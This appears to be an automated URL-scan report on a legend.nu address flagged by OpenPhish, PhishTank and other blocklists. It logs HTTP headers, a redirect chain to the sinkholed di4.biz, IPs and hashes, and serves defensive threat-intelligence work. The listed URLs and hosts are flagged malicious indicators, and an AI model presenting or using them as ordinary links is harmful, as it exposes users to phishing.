Md5: 21fd2ff471cab32871d4174e8fc656ba Sha1: ee6362f36470fea2a8a3432c12520f9a10175b68 Sha256: 01c3e63861073442cdbc414358415d2989ecffd9c3989e7946baec540b1066c0
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F8fc8f8f0-162f-412f-aae9-5d8f363b48af.jpeg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: img-getpocket.cdn.mozilla.net/296x148/filters:format(jp (...) FQDN: img-getpocket.cdn.mozilla.net IP: 34.120.237.76 HASH: 6776e0f75644cc543388587de52bbb78f39cd058cb751e7e84cdd3ca8baa0c9f 34.120.237.76 HTTP/2 200 OK content-type: image/jpeg server: nginx content-length: 2987 x-amzn-requestid: 14097870-fb20-4362-b281-4244cf558033 x-xss-protection: 1; mode=block access-control-allow-origin: * strict-transport-security: max-age=63072000; includeSubdomains; preload x-frame-options: DENY content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: arv19Fb4IAMFuoA= x-content-type-options: nosniff x-amzn-trace-id: Root=1-635af9bf-6c59ff2a3f54af5b675696cf;Sampled=0 x-amzn-remapped-date: Thu, 27 Oct 2022 21:35:59 GMT x-amz-cf-pop: HIO50-C1, SEA19-C2 x-cache: Hit from cloudfront x-amz-cf-id: UyYN42fsF2EDEnRYd9ebhfBVnl3CojcYRnzl8tifoVctvZm5xmGdOw== via: 1.1 a4fe306096165bb1e86e69365dc8fac2.cloudfront.net (CloudFront), 1.1 559326ad73233233a9e52cb9e8601ede.cloudfront.net (CloudFront), 1.1 google date: Thu, 27 Oct 2022 21:41:18 GMT age: 40367 etag: "c5d29e8859c7d885c5f4829a1fb64e144267ab13" cache-control: max-age=3600,public,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data Size: 2987 Md5: 46deaa111c196a313a563af1e22921a1 Sha1: c5d29e8859c7d885c5f4829a1fb64e144267ab13 Sha256: 6776e0f75644cc543388587de52bbb78f39cd058cb751e7e84cdd3ca8baa0c9f
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2F0b6e2a26-e87a-4329-8df1-ba2276a57eba.webp HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: img-getpocket.cdn.mozilla.net/296x148/filters:format(jp (...) FQDN: img-getpocket.cdn.mozilla.net IP: 34.120.237.76 HASH: 734419d9f9c28185501c25db3e0df01f2dc901a1a87bcdd066028392c8c82cf5 34.120.237.76 HTTP/2 200 OK content-type: image/jpeg server: nginx content-length: 14602 x-amzn-requestid: f3e186c6-4734-4c1b-a432-aa799a12ed4e x-xss-protection: 1; mode=block access-control-allow-origin: * strict-transport-security: max-age=63072000; includeSubdomains; preload x-frame-options: DENY content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: arv9yGaMoAMFZ4A= x-content-type-options: nosniff x-amzn-trace-id: Root=1-635af9f1-05c8bdc2153acd8915e04826;Sampled=0 x-amzn-remapped-date: Thu, 27 Oct 2022 21:36:49 GMT x-amz-cf-pop: HIO50-C1, SEA19-C2 x-cache: Hit from cloudfront x-amz-cf-id: -LtByCyKdn883A5CbwMzP1WXAsdL1X8sDa8qyRWuDmYGUNS-u9xTJA== via: 1.1 1cc6ed0d2d3dd9529ce544f9dfe61a52.cloudfront.net (CloudFront), 1.1 f9d716a351f14a0ac1fac2449734849a.cloudfront.net (CloudFront), 1.1 google date: Thu, 27 Oct 2022 22:28:50 GMT age: 37515 etag: "9d0fc7b50cbb96a3e85ccb501ed1d60a39a164d3" cache-control: max-age=3600,public,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data Size: 14602 Md5: 13bafc15fa2fe97e27115e17bce8b22f Sha1: 9d0fc7b50cbb96a3e85ccb501ed1d60a39a164d3 Sha256: 734419d9f9c28185501c25db3e0df01f2dc901a1a87bcdd066028392c8c82cf5
GET /index.php?p=mu4genjugq5dcmjrhe3a&sub2=titlespeed8 HTTP/1.1 Host: 0.greenskymotions.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: https://greenskymotions.net/ Cookie: uuid=16738a15-f934-4aa4-83be-20047edaf749 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-site TE: trailers	URL: 0.greenskymotions.net/index.php?p=mu4genjugq5dcmjrhe3a& (...) FQDN: 0.greenskymotions.net IP: 185.177.94.152 185.177.94.152 HTTP/2 200 OK content-type: text/html; charset=UTF-8 server: nginx date: Fri, 28 Oct 2022 08:54:04 GMT access-control-allow-origin: * set-cookie: uuid=16738a15-f934-4aa4-83be-20047edaf749; expires=Sun, 27-Nov-2022 08:54:04 GMT; Max-Age=2592000; path=/; domain=0.greenskymotions.net strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests X-Firefox-Spdy: h2 --- Additional Info ---
GET /?auf=mfqwgztgmu5dcnrqgixtcmjrhe3c6mjzf5tdkmtfmrrdinjpgezc6mjwgy3dsnbxgi2di&p=b&sub1=&sub2=titlespeed8&sub3=&sub4=&cpc=0&cpm=0 HTTP/1.1 Host: di4.biz User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: https://0.greenskymotions.net/ Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: cross-site	URL: di4.biz/?auf=mfqwgztgmu5dcnrqgixtcmjrhe3c6mjzf5tdkmtfmr (...) FQDN: di4.biz IP: 185.177.92.179 185.177.92.179 HTTP/2 200 OK content-type: text/html; charset=UTF-8 server: nginx date: Fri, 28 Oct 2022 08:54:05 GMT access-control-allow-origin: * set-cookie: uuid=a1c5b7ac-bfce-4724-adf4-b70f23d56beb; expires=Sun, 27-Nov-2022 08:54:05 GMT; Max-Age=2592000; path=/ strict-transport-security: max-age=31536000 content-security-policy: img-src https: data:; upgrade-insecure-requests X-Firefox-Spdy: h2 --- Additional Info --- Alerts: Blocklists: - quad9: Sinkholed

URL	legend.nu/personal-disk/VAlWCjth-ecLJq0E-module/6199746691-sNIGrruBaNwrmrp-cJ9mWd-UgM7YnMg/439681842717-zqUods5c/
IP	64.40.126.65 (Canada)
ASN	#14280 NETNATION
UserAgent	Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Referer
Report completed	2022-10-28 08:54:13 UTC
Status	Loading report..
IDS alerts	0
Blocklist alert	4
urlquery alerts	No alerts detected
Tags	None

Overview

Domain Summary (12)

Network Intrusion Detection Systems

Suricata /w Emerging Threats Pro

Blocklists

OpenPhish

PhishTank

Fortinet's Web Filter

mnemonic secure dns

Quad9 DNS

Files

No files detected

Recent reports on same IP/ASN/Domain/Screenshot

Last 5 reports on IP: 64.40.126.65

Last 5 reports on ASN: NETNATION

Last 5 reports on domain: legend.nu

Last 5 reports with similar screenshot

JavaScript

Executed Scripts (8)

Executed Evals (2)

#1 JavaScript::Eval (size: 7962) - SHA256: 7a24518fd78ad356f70fc8d316e1a4ce3b9d43c70ef2e5cf00a9f03cb4fb8d20

#2 JavaScript::Eval (size: 8090) - SHA256: 0e267e69873411b64c940d2e4d4ea9ba7cecf5b398e2c5568a469ea5576d8cd1

Executed Writes (0)

HTTP Transactions (28)

Overview

Domain Summary (12)

Network Intrusion Detection Systemsinfo

Suricata /w Emerging Threats Pro

Blocklists

OpenPhish

PhishTank

Fortinet's Web Filter

mnemonic secure dns

Quad9 DNS

Files

No files detected

Recent reports on same IP/ASN/Domain/Screenshot

Last 5 reports on IP: 64.40.126.65

Last 5 reports on ASN: NETNATION

Last 5 reports on domain: legend.nu

Last 5 reports with similar screenshot

JavaScript

Executed Scripts (8)

Executed Evals (2)

#1 JavaScript::Eval (size: 7962) - SHA256: 7a24518fd78ad356f70fc8d316e1a4ce3b9d43c70ef2e5cf00a9f03cb4fb8d20

#2 JavaScript::Eval (size: 8090) - SHA256: 0e267e69873411b64c940d2e4d4ea9ba7cecf5b398e2c5568a469ea5576d8cd1

Executed Writes (0)

HTTP Transactions (28)

Network Intrusion Detection Systems